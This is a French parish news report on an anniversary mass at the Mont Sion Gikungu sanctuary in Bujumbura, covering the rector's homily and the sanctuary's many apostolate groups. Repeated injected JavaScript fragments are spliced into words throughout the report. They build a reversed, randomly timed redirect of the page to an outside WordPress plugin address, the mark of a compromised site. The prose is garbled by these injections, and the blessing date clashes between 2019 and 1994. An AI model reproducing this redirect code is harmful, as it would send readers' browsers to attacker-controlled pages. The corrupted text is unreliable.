Ce trentième dimanche du Temps Ordinaire a coïncidé avec la célébration du vingt-huitième anniversaire de la bénédiction du sanctuaire qui a pris le nom de la Reine de la Paix et la Réconciliation de Mont Sion Gikungu en cette même date de l’année 2019 par Monseigneur Gervais BANSHIMIYUBUSA, l’Archevêque de l’Archidiocèse de BUJUMBURA. Le sanctuaire a très bien saisi cette date anniversaire et a prévu de commencer chaque fois une nouvelle année liturgique. En ce jour, nous commençons l’année liturgique 2022-2023. ‘Le Seigneur a encore une fois manifesté son amour envers nous et nous a rassemblés en ce lieu pour l’écouter et lui parler’, a martelé le Père Recteur du Sanctuaire, Père Longin NTIRANYIBAGIRA, qui avait présidé la sainte messe de ce jour.  Les chorales Saint Nicolas de Flüe et Sancta Maria étaient en lice en ce qui est de l’animation de la messe en chants liturgiques. En ce trentième dimanche encore, l’Église universelle célébrait la journée mondiale de la Mission. Les lectures du jour sont respectivement tirées du Livre de Siracide (35, 15b-17. 20-22a), de la seconde épître de saint Paul à Timothée (4, 6-8. 16-18) et de l’Évangile de Jésus Christ selon saint Luc (18, 9-14).

Dans sa prédication homilétique, le Père Recteur a commencé par préciser les débuts du sanctuaire. C’était en l’an 1990 quand le Pape Jean Paul II a visité le Burundi et a célébré une messe près de Mont Sion Gikungu. Après quatre ans seulement, en 1994, nous avons reçu le sanctuaire qui a été béni par Son Excellence Monseigneur Simon NTAMWANA qui était l’Évêque du Diocèse de Bujumbura, devenu Archidiocèse de Bujumbura peu après. On est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc en droit de nous demander qu’est-ce que le sanctuaire. Les deux personnes toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont l’Évangile nous a parlé, un pharisien et un collecteur d’impôts, se sont dirigées vers la Synagogue qui est un lieu où on écoute le Seigneur et on lui parle. Nous comprenons toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc que l’église est une fenêtre que le Seigneur ouvre pour nous afin que nous le contemplions dans sa gloire. La Vierge Marie a su que tout ce qu’elle a vient de Dieu et tout ce qu’elle fait toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être dirigé vers la gloire de Dieu. Elle est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donc notre Mère avec qui nous scellons notre alliance d’amour. Elle est également notre référence quant à l’accomplissement de la volonté divine. Comme nous nous préparons bien à accueillir des hôtes de marque, nous devons aussi faire de même quand nous devons nous présenter à l’église comme un lieu de rencontre entre nous et notre Seigneur. Le pharisien a commencé à vanter ses qualités tout en méprisant son prochain le collecteur d’impôts. Nous comprenons ici la valeur et la prière que Jésus nous apprend, le Notre Père, qui nous indique que nous sommes des enfants égaux devant un seul Père qui nous aime.

L’Église fête la journée mondiale de la Mission, et nous devons le faire comme en famille car c’est un apostolat qui nous concerne tous. Pour ce faire, nous devons nous attacher à la prière tout en espérant que nous obtiendrons beaucoup de grâces nécessaires à faire toute la volonté divine. Soyons-en sûrs, nous qui sommes de Mont Sion recevons beaucoup de grâces au sanctuaire, c’est pourquoi nous ne devons pas nous passer de ce lieu. C’est de là que nous recevons notre apostolat. Pour illustrer cela, le Père Recteur a tenu à énumérer tous les groupes qui font leur apostolat au sanctuaire et un bref aperçu de leur apostolat.

La commission Liturgie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont la préoccupation première est tout arranger à la sacristie et à l’autel afin que la célébration eucharistique se déroule dans de bonnes conditions et soit la plus belle possible. Elle comprend entre autres les sous-commissions Servants de messe, les lecteurs de la Parole de Dieu au cours des messes, les danseurs et danseurs (Abatambiramana/ Abiyerekeramana). La seconde commission est chargée d’assurer le protocole au sanctuaire et particulièrement dans l’église. L’apostolat du groupe exige que les membres soient debout et presque en mouvement pour la plupart du temps. De temps en temps, les pèlerins refusent de compatir à leur préoccupation et préfèrent se révolter ou s’insurger contre les personnes qui assurent leur protocole. Le Père NTIRANYIBAGIRA a profité de cette opportunité pour demander partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don à la place de ces pèlerins qui ne comprennent pas les exigences de l’apostolat du groupe.

A côté de ces deux groupes susmentionnés, il y a bien d’autres. La commission Encadrement des enfants comprend des membres qui ont compris que l’éducation des enfants toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit être assurée dès leur bas âge. Il en est de même pour leur chrétienté. Les membres de ce groupe sont organisés pour apprendre aux enfants les bonnes manières à prendre à l’église aux enfants. Le groupe suivant est dénommé Abateramirakirimba, comprenant en son sein trois sous-groupes, à savoir Abateramirakirimba I qui recite le rosaire tous les samedis après la messe du matin, Abateramirakirimba II recite quant à lui le rosaire les samedis soir à 17 heures. Le troisième sous-groupe est composé de vieilles mamans qui ont en charge la propreté de l’église qui toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doit accueillir des pèlerins tous les jours. Le groupe Mukama menyekana a pour apostolat de nous rappeler que nous devons avoir notre Bible sur nous et la lire, aider dans la direction de la prière avec les Psaumes tous le jeudis et samedis soir ainsi que l’animation des soirées bibliques chaque dernier lundi du mois. Le sixième groupe comprend toutes les chorales œuvrant au sanctuaire, elles sont actuellement à huit. Elles sont nommément la Chorale Sainte Famille, Chorale Saint Nicolas de Flue, Chorale Sancta Maria, Chorale Saint Martin, Chorale Sainte Thérèse de l’Enfant Jésus, Chorale sainte Maria Goretti, Chorale Saint Philippe Neri et la Chorale Pueri Cantores Maria Goretti pour les petits enfants.

Bien d’autres groupes font leur apostolat au sein du sanctuaire. Il sied de mentionner aussi le groupe Inakirimba qui est organisé pour la collecte des offrandes à l’église et les acheminer jusqu’à destination. La commission Action Carême tient à cœur de venir en aide à nos frères et sœurs en situation de pauvreté. Les membres de la commission collectent nos aides et les acheminent vers les plus nécessiteux selon les moyens disponibles. La commission Santé toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne des soins nécessaires aux pèlerins qui ont d’éventuels malaises sanitaires lorsqu’ils sont en pèlerinage au sanctuaire. La commission communication se charge de la publication des évènements qui se passent au sanctuaire. Ces publications passent sur différents réseaux sociaux pour faciliter nos frères et sœurs qui ne peuvent pas se rendre dans des églises pour multiples raisons ou qui veulent savoir ce qui se passent ici. Il y a aussi la commission Justice et paix qui aide à résoudre des différends qui peuvent surgir entre les collaborateurs ou pèlerins.

Nous ne pouvons pas oublier la commission qui assure le Décor de l’église et du sanctuaire chaque fois qu’il y a des évènements grandioses ou des circonstances solennelles qui rassemblent beaucoup de pèlerins au sanctuaire. Il y a en plus la commission chargée de bien aménager des lieux où des pèlerins toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent se rencontrer en plus de l’église qui est déjà en place. La commission Sécurité aide à assurer la tranquillité des pèlerins et de leurs biens lors de leur passage dans les enceintes du sanctuaire. Le groupe des tambourinaires est l’un de nos groupes folkloriques qui agrémentent les célébrations eucharistiques solennelles et autres fêtes au sein du sanctuaire. Les amis de la Radio Maria forment un groupe qui devient plus actif en ce qui est de l’organisation et le déroulement des semaines de Mariathon. Ceci se fait en collaboration avec toutes les institutions de la Radio Maria Burundi. Les quatre autres groupes à mentionner sont le Renouveau Charismatique Catholique (RCC), la Coordination des commissions, la Coordination des chorales et la Coordination des jeunes. Le RCC aide les fidèles à réveiller leurs toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons et talents par la prière, à commencer par la louange ainsi que l’organisation des séances d’évangélisation. Les coordinations des chorales et des jeunes ont à leur charge l’organisation générale des chorales, commissions ou les jeunes issus de tous les groupes. Le groupe dit Cercle de Sion se veut plus discret et il semble moins connu des pèlerins, mais il est actif en son sein.

Le Père Longin en a appelé à la conscience de chacun pour savoir dans quel groupe d’apostolat on appartient avant de se précipiter à demander une attestation de reconnaissance de la chrétienté auprès du rectorat. ‘ A vingt-huit ans, le sanctuaire est suffisamment mûr pour toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donner naissance à d’autres nouveaux sanctuaires. Dans cette perspective, un sanctuaire est en pleine construction dans l’Archidiocèse de Gitega, et on procèdera à la pose de la première pierre pour l’édification d’un autre sanctuaire dans le Diocèse d’Uvira en République Démocratique du Congo le 27 courant. ‘Comprenons que le Royaume de la Vierge Marie est toujours en expansion’, a précisé le prédicateur du jour. Avec ces mots, le Père Recteur du Sanctuaire a tenu à remercier tous les collaborateurs et même ceux qui voudrons bien les rejoindre pour l’apostolat du sanctuaire.

Signalons ici qu’après l’homélie il y a eu des cérémonies de port de foulard pour des jeunes garçons du Mouvement de Schoenstatt, l’acte de sceller l’alliance d’amour à un autre groupe et un dernier groupe qui a couronné la Vierge Marie à titre individuel. A la fin de la messe, il y a eu procession de tous ces groupes devant les autres pèlerins vers le sanctuaire pour la bénédiction solennelle finale.

NYANDWI M.